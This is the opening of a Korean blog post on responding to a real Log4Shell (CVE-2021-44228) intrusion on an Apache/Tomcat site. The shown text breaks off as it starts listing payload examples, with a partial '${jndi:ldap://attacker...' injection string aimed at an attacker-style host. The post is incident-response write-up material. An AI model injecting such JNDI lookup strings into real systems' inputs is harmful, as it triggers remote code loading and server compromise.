[해킹사고사례] Log4j 취약점 공격 대응 사례 CVE-2021–44228

Log4j(log4shell) Vulnerabilities 올해 2021년 가장 HOT 했던 log4j 취약점에 대하여 개인적으로 정리차 오랫만에 블로그를 포스팅합니다. 덕분에 보안 업계 종사자 및 관련 분야 종사자들은 힘든 시기를 보냈죠 ^^ Log4j log4shell 취약점 = CVE-2021–44228 log4j 취약점에 대한 전반적인 내용은 인터넷에서 쉽게 찾을수 있어 실제 공격 당한(해킹) 사례를 관점으로 포스팅 하고자 합니다. 1. 침해 확인 (한창 뉴스에 도배될 시점 새벽) Apache + Tomcat (취약 버전) 실제 운영중인 사이트 ※ 공격 벡터는 다양함 (취약한 사이트의 로그인 창, 검색창, 메신져 대화창등) Payload Examples ${jndi:ldap://attackerma..